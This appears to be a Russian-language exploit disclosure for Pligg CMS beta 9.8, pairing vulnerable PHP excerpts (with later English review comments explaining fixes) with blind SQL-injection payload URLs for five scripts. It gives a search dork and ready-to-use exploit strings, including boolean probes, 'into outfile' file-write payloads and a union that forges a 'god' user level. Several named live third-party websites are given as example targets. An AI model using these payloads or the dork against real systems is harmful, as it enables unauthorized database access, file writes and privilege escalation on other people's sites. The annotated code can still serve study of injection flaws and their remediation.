
Обзор уязвимостей Pligg
Продукт: Pligg Content Management System
Beta 9.8
09.08.2007
Homepage: http://www.pligg.com
Дорк: Powered By Pligg
Blind SQL-injection
magic_quotes = off
/out.php
PHP код:
------------------------
...
// NOTE(review): the leading `$` is missing in the post's transcription of this
// line; the rest of the excerpt reads the value as $requestID.
requestID = $_REQUEST['id'];
// All three values come straight from $_REQUEST (GET/POST/COOKIE). Nothing
// below escapes or type-checks them before they reach the query strings.
$requestTitle = $_REQUEST['title'];
$requestURL = $_REQUEST['url'];
// isset() is true whenever the `title` parameter was supplied (the assignment
// above yields null otherwise).
if(isset($requestTitle)){
// $requestTitle is interpolated into the SQL text verbatim. With magic_quotes
// off (the condition stated in the heading above), a quote in the parameter
// closes the literal and the remainder is parsed as SQL -- this is the
// injection sink. Mitigation: pass the value as a bound parameter, or at least
// escape it through the DB layer; never interpolate request data into SQL.
$requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';");
}
if(isset($requestURL)){
// Same pattern for the `url` parameter: unescaped interpolation into the query.
$requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_url` = '$requestURL';");
}
// is_numeric() validates only the lookup result, not the inputs above; the
// tainted query has already executed by this point. Because only this
// true/false outcome affects behaviour, the post classifies the issue as blind.
if(is_numeric($requestID)) {
...
------------------------
exploit: http://pligg/out.php?title=' union select if(true,1,null) -- -
http://pligg/out.php?title=' union select if(false,1,null) -- - example:
http://tutoriality.com/out.php?title=1' union select if(true,1,null) -- -
http://tutoriality.com/out.php?title=1' union select if(false,1,null) -- -
exploit: http://pligg/out.php?url=' union select if(true,1,null) -- -
http://pligg/out.php?url=' union select if(false,1,null) -- - example:
http://tutoriality.com/out.php?url=' union select if(true,1,null) -- -
http://tutoriality.com/out.php?url=' union select if(false,1,null) -- -
Blind SQL-injection
register_globals = on
/userrss.php
PHP код:
------------------------
...
// $login is assigned only when the `user` parameter is present.
// NOTE(review): the heading states register_globals = on; under that setting
// an otherwise-unassigned $login may also be seeded from the request -- confirm
// against the full file.
if(isset($_REQUEST['user'])){$login = $_REQUEST['user'];}
$user=new User();
$user->username = $login;
// Unknown users are rejected before any of the queries below are built.
if(!$user->read()) {
echo "error: user does not exist";
die;
}
...
// $rows is taken verbatim from the request and ends up in `LIMIT $rows` at the
// bottom of the excerpt without a numeric cast. !empty() only rejects
// ''/'0'/null, it is not validation. Mitigation: (int)$rows with a sane upper bound.
if(!empty($_REQUEST['rows']))
$rows = $_REQUEST['rows'];
else $rows = 40;
...
if(!empty($_REQUEST['status'])) {
$status = $_REQUEST['status'];
} else {
// By default it searches on all
// NOTE(review): both branches assign 'all', so $search has no effect here.
if($search) $status = 'all';
else $status = 'all';
}
// $order_field and $from_where are assigned only inside a matching case. No
// `default:` branch is visible in the excerpt, so for a $status value that
// matches no case they remain unassigned -- and with register_globals = on a
// request variable of the same name takes their place when they are
// concatenated below. Defensive fix: initialise both to safe literals before
// the switch and reject unknown $status values with a default branch.
switch ($status) {
case 'published':
$order_field = 'link_published_date';
$link_date = 'published_date';
$title = $main_smarty->get_config_vars("PLIGG_Visual_Published_News");
$from_where = "FROM " . table_links . " WHERE link_status='published' ";
break;
case 'queued':
... case
... }
$from_where .= " AND link_author=$user->id "; // this is where a piece of the SQL query can be appended (original author's note)
// $order_field, $from_where and $rows are all concatenated into SQL text
// without escaping; none of the three is constrained to a known-safe value by
// the code shown here.
$order_by = " ORDER BY $order_field DESC ";
$last_modified = $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where");
$sql = "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows";
------------------------
exploit http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and true -- -
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and false -- - example
http://masnoticias.dosmanzanas.com/userrss.php?user=BriceLamchi&rows=5&status=1&order _field=link_date&from_where=from pligg_links where link_id=1 and true -- -
http://masnoticias.dosmanzanas.com/userrss.php?user=BriceLamchi&rows=5&status=1&order _field=link_date&from_where=from pligg_links where link_id=1 and false -- -
Blind SQL-injection
magic_quotes_gpc = off
/login.php
PHP код:
------------------------
...
if($_POST["processlogin"] == 3) { // if user requests forgotten password
// trim() removes surrounding whitespace only; quotes and other SQL
// metacharacters pass through untouched.
$username = trim($_POST['username']);
// The only validation is a non-empty check.
if(strlen($username) == 0){
$errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
}
else {
// $username is concatenated into the query unescaped (magic_quotes_gpc = off
// per the heading above) -- the injection sink. The only observable outcome is
// whether a row comes back (the if($user) below), hence "blind".
// Mitigation: a parameterised query, or escaping through the DB layer.
$user = $db->get_row("SELECT * FROM `" . table_users . "` where `user_login` = '".$username."'");
if($user){
// Salt for the password-reset flow. uniqid() and rand() are not
// cryptographically secure sources; random_bytes() is the appropriate
// replacement for anything that acts as a secret.
$salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
...
------------------------
exploit: POST:http://pligg/login.php?processlogin=3&username=root' or false -- -
POST:http://pligg/login.php?processlogin=3&username=root' or true -- -
if file_priv=Y
/login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/path/pligg.txt' -- -
POST:http://www.innovationworx.com/cafe/login.php?processlogin=3&username=root' or true -- -
POST:http://www.innovationworx.com/cafe/login.php?processlogin=3&username=root' or false -- -
POST:http://www.innovationworx.com/cafe//login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/tmp/tmp.txt' -- -
Blind SQL-injection
magic_quotes = off
/story.php
PHP код:
-------------------------
...
// strip_tags() removes HTML markup only; it does not touch quotes or other SQL
// metacharacters, so it is not an SQL escaping step.
if(isset($_REQUEST['title'])){$requestTitle = strip_tags($_REQUEST['title']);}
...
if(isset($requestTitle)){
// $requestTitle is interpolated into the query verbatim (magic_quotes = off per
// the heading above): injection sink. Bind the value as a parameter instead
// of building the statement as a string.
$tmp = "SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';";
$requestID = $db->get_var($tmp);
}
...
-------------------------
exploit: http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- - example:
http://tutoriality.com/story.php?title=sweating__sweating' and (substring(version(),1,1))>1-- -
http://namecritics.com/story.php?title=clock_jewels' and (substring(version(),1,1))%3E1-- -
Blind SQL-injection
/editlink.php
PHP код:
-------------------------
...
if(isset($_GET['id'])){
$theid = strip_tags($_GET['id']);
}
// When both are present, the POST value overrides the GET value.
if(isset($_POST['id'])){
$theid = strip_tags($_POST['id']);
}
...
// $theid is concatenated into the query in an unquoted numeric position, and
// strip_tags() only removes HTML markup, so any non-numeric content becomes
// part of the SQL. Because no quote is needed to leave a numeric context,
// magic_quotes would not help here either. Mitigation: cast with (int) or
// reject non-numeric ids before building the query, or use a bound parameter.
$link = $db->get_row("SELECT link_id, link_author FROM " . table_links . " WHERE link_id=".$theid.";");
if ($link) {
// The ownership check below is evaluated on the row returned by the tainted
// query, so the authorisation decision is influenced by the same input.
if ($link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god")
{
...
-------------------------
exploit http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -
if file_priv=Y
http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- - example:
http://www.innovationworx.com/cafe/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://www.innovationworx.com/cafe/editlink.php?id=-1 union select 1,if(false,'god',1)-- -
(c) AFoST